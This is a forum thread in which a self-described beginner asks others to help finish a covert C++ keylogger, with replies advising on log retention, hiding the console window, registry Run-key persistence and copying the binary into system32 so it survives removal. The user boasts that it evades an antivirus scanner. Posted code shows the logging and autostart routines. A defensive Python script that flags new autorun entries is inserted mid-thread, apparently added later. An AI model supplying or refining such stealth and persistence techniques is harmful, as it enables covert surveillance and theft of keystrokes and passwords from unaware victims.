(C++) keylogger code question
- Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
Ok, I have this code, and it works, but for some reason it does not save that much to the text file that has all the keystrokes in it (it only saves a keylogged file of like the newest 5 lines or 10 words). I'm trying to get it to save everything typed in within a 24 hour period or so, not just the last 10 words typed. I tried changing #'s in the variables and such to get it to save more information than a 1k text file but have not gotten it to work yet. It also flashes a small black DOS screen for like half of a second when loaded, which would be noticeable for a user running it. I posted the link for the code below, thanks
http://code.suck-o.com/92
Well it seems like when the logfile reaches "LogLength" it will close the file and then reopen it, causing the data to be overwritten. So I guess you could either change the "LogLength" limit, or rewrite the if statement further down so that it stops at a specific time.
It's odd though, because it reads it into buffer, and then closes the file. Then opens it again. You would think that it would flush the buffer into the file again after that. But it has a maximum buffer, and also it has a "sleep 10" further up to make it not use 100% cpu.
Changing this if statement seems to be the most logical thing to do ^^. I haven't read all the code, but that's my conclusion from just waking up.
Code: Select all
if(len>=LogLength)
{
    fseek(file,0,SEEK_SET);//go to beg.
    buf=(char *)malloc(len);//malloc buffer
    freadindex=fread(buf,1,len,file);//read into buffer
    buf[freadindex] = '\0';//Extra bit I have to add to make it a string
    fclose(file);
    file = fopen(FileName,"w");
}
"The best place to hide a tree, is in a forest"
- Still_Learning
I tried changing the log length from 100 to 1000 but did not see a difference when the log file was created.
Wouldn't not using 100% be more stealth? As of now I ran it through AVG scanner and it is undetectable, but Comodo firewall catches it (if you read the info before clicking "Allow")..
What would you recommend changing in the IF statement? I'm a noob at this, this is my first C++ project I guess, but am learning a lot by doing this, thanks Cats!
Well, there are some oddities in the code, and I can't really go through it all at the moment (studying for an exam), but you can try to remove or lessen "sleep 10", to "sleep 1" or something, to see if it does anything. Because as it looks now, it puts the whole program to sleep for 10 seconds, then continues to check for keys, but I guess it would work if it reads from the buffer and then flushes to the file.
I can take a closer look at it later, the "check char" part looks pretty good though ^^.
"The best place to hide a tree, is in a forest"
- Still_Learning
Ok, I think I have it working now.. the only question now I guess is why won't it run automatically when Windows starts up? I can see where the registry key was added with the code
when I run it, I can see it in the processes and see the key logging working, but on restart it does not seem to be working / autorun..
What am I doing wrong?
So far I want the keylogger to auto start on Windows boot and write to the log file, that's it.. and to make it as stealth as possible. So far, I've gotten it to just flash a black DOS screen for like half a second, no flashing screen would be best though.. any suggestions for a fix?
The new code is at http://code.suck-o.com/93
Code: Select all
/* Grab filename of process/exe using GetModuleFileName() function. */
TCHAR szPath[MAX_PATH];
GetModuleFileName(NULL,
                  szPath,
                  MAX_PATH);

/* Create a New HKEY. */
HKEY newValue;

/* Open Registry key. */
RegOpenKey(HKEY_LOCAL_MACHINE,
           "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
           &newValue);

/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the
   current user only.
   Now give a new value.
   Syntax for RegSetValueEx() function is
   LONG WINAPI RegSetValueEx(
       __in HKEY hKey,
       __in_opt LPCTSTR lpValueName,
       __reserved DWORD Reserved,
       __in DWORD dwType,
       __in_opt const BYTE* lpData,
       __in DWORD cbData
   );
   More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */
RegSetValueEx(newValue,
              "keylogger2.exe",
              0,
              REG_SZ,
              (LPBYTE)szPath,
              sizeof(szPath));

/* Close the key. */
RegCloseKey(newValue);
return 0;
Well, did you check the registry to see that it adds the key? And is your file named "keylogger2.exe" as it says in the code? And is the path for the file added correctly?
A tip is to make a syscall and have the system copy the file to a specified location (like system32) and then make the key point to the file there, so even if the user removes the file that he/she ran, it would still run from system32 the next time. Also, make sure that the program "checks" if the file exists in system32, before it tries to copy the file (no use doing it if it already exists)
"The best place to hide a tree, is in a forest"
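From the defender's side, a value written to the HKLM Run key like the one in the code above stands out when autorun entries are compared against a known-good snapshot. The following is an added example, not part of the original thread or the posted code: it diffs two snapshots of `reg query` text output for a Run key and flags new or changed values. The snapshots, the user name "alice", and the path and naming heuristics are constructed assumptions.

```python
import re

# Line format of `reg query` text output: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_\w+) {4}(?P<data>.*)$")
# Assumed heuristic: directories a standard user can normally write to.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

# Constructed snapshots (not real captures); "alice" is a made-up user name.
BASELINE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""
CURRENT = BASELINE + r"""    keylogger2.exe    REG_SZ    C:\Users\alice\Desktop\keylogger2.exe
"""


def parse_reg_query(text):
    """Return {(key, value_name): data} parsed from `reg query` text output."""
    entries, key = {}, None
    for line in text.splitlines():
        if line.upper().startswith("HKEY_"):
            key = line.strip().lower()
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            entries[(key, m["name"].lower())] = m["data"]
    return entries


def audit(baseline_text, current_text):
    """List (value_name, data, reasons) for autorun values that differ from the baseline."""
    baseline = parse_reg_query(baseline_text)
    findings = []
    for ident, data in parse_reg_query(current_text).items():
        if ident not in baseline:
            reasons = ["new autorun value"]
        elif baseline[ident] != data:
            reasons = ["autorun target changed"]
        else:
            continue  # unchanged since the baseline
        if any(p in data.lower() for p in USER_WRITABLE):
            reasons.append("target in user-writable path")
        if ident[1].endswith(".exe"):
            # Heuristic: a bare file name used as the value name, as in the thread.
            reasons.append("value name is a file name")
        findings.append((ident[1], data, reasons))
    return findings


if __name__ == "__main__":
    for name, data, reasons in audit(BASELINE, CURRENT):
        print(f"{name} -> {data}: {', '.join(reasons)}")
```

Because the comparison is against a baseline, a binary copied into a system directory and registered from there is still reported as a new autorun value even though the path heuristic does not fire.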
- Still_Learning
Humm... how would I make it to log up to say 5 MB of keys, then it will keep overwriting the oldest text with newer after it hits the 5 MB mark?
I am not sure how to define the file size..
or why it is not booting along with Windows ...
Bad Brain, DNR, Floodhoundz, anyone else have an idea or helpful advice? The code compiles and works, but not how I want it to yet, thanks
Well, as mentioned in the code....
Try that instead (it should work anyway, but since I don't have Windows, I can't and won't test the code)
Code: Select all
/* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the
current user only.
"The best place to hide a tree, is in a forest"
qeinar wrote: the sleep function is given in milliseconds so sleep(1) would be close to nothing.. for the showing screen, it's just how long time it takes to execute the stealth command you're using.
Ah yes, that is correct, I was referring to the system call. My apologies
"The best place to hide a tree, is in a forest"
- Still_Learning
qeinar wrote: the sleep function is given in milliseconds so sleep(1) would be close to nothing.. for the showing screen, it's just how long time it takes to execute the stealth command you're using.
Yeah but it still shows
Even with sleep(0) it flashes real quick
Also am having other bugs, anyone want to co-help on making a keylogger? I am trying to learn C++ and figured this would be a nice project. Cats, you are also learning, correct? Let's collaborate on a keylogger